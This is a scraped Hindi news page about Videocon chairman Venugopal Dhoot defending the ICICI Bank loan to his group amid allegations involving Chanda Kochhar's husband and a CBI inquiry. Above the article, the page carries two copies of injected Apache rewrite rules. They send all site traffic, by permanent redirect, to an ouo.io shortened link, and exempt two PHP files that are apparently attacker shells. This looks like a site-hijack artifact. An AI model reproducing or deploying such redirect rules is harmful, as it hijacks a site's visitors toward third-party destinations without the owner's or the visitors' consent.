
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 393
Previousमुंबई। आईसीआईसीआई बैंक से लोन के बदले कथित तौर पर बैंक की चेयरमैन चंदा कोचर के पति दीपक कोचर की कंपनी को मदद पहुंचाने के मामले में वीडियोकॉन समूह के चेयरमैन वेणुगोपाल धूत ने चुप्पी तोड़ी है। उन्होंने कहा, ‘मैं लोन मंजूर करने वाली समिति के सभी 12 सदस्यों को जानता हूं। बैंक के पूर्व चेयरमैन केवी कामत (समिति के प्रमुख) के साथ तो मैं अक्सर लंच करता रहा हूं। दो लोगों के बीच व्यक्तिगत संबंध होने का परिणाम हमेशा आपराधिक कृत्य (क्रिमिनल एक्ट) नहीं होता है।आईसीआईसीआई बैंक से कर्ज मामले में चंदा कोचर से जुड़े सवाल पर वेणुगोपाल धूत ने कहा कि इसमें कुछ भी गैरकानूनी नहीं था। वे लोन मंजूर करने वाली 12 सदस्यीय समिति की एक सदस्य मात्र थीं। समिति ने वीडियोकॉन समूह का 3,250 करोड़ रुपए का लोन मंजूर किया था।’ वीडियोकॉन समूह पर चंदा कोचर के पति दीपक कोचर की कंपनी न्यूपावर रिन्यूएबल्स में निवेश का आरोप है। इस सवाल पर धूत ने कहा कि उन्होंने पुरानी दोस्ती के चलते दीपक कोचर की कंपनी में 2.5 लाख रुपए निवेश करने पर सहमति दी थी। सीबीआई की प्रारंभिक जांच (पीई) पर धूत ने कहा कि जांच एजेंसी ‘फर्जी शिकायतों’ सहित सभी आरोपों की जांच कर रही है। सीबीआई ने 2012 में वीडियोकॉन समूह को दिए गए कर्ज को लेकर आईसीआईसीआई बैंक के कुछ अधिकारियों से भी पूछताछ की है। जांच एजेंसी यह पता लगाने की कोशिश कर ही है कि बैंक द्वारा 2012 में वीडियोकॉन समूह को दिए 3,250 करोड़ के लोन के बदले कोई और मदद की गई। पिछले दिनों आई रिपोर्ट में वीडियोकॉन समूह को लोन मुहैया कराने के बदले आईसीआईसीआई बैंक की प्रमुख चंदा कोचर के पति दीपक कोचर को कथित तौर पर मदद पहुंचाने का आरोप लगाया गया है। आईसीआईसीआई बैंक ने वर्ष 2012 में वीडियोकॉन समूह को 3,250 करोड़ रुपए का लोन दिया था। इसमें से 2,810 करोड़ रुपए के कर्ज को बैंक ने पिछले साल फंसे कर्ज (एनपीए) में डाल दिया था।